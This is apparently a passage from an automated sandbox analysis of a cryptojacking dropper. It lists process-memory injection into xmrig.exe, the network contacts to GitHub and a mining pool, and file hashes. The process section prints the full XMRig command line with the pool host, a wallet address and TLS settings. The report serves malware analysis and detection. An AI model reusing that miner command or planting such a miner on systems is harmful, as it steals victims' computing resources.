| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1316 wrote to memory of 4524 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1316 wrote to memory of 4524 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |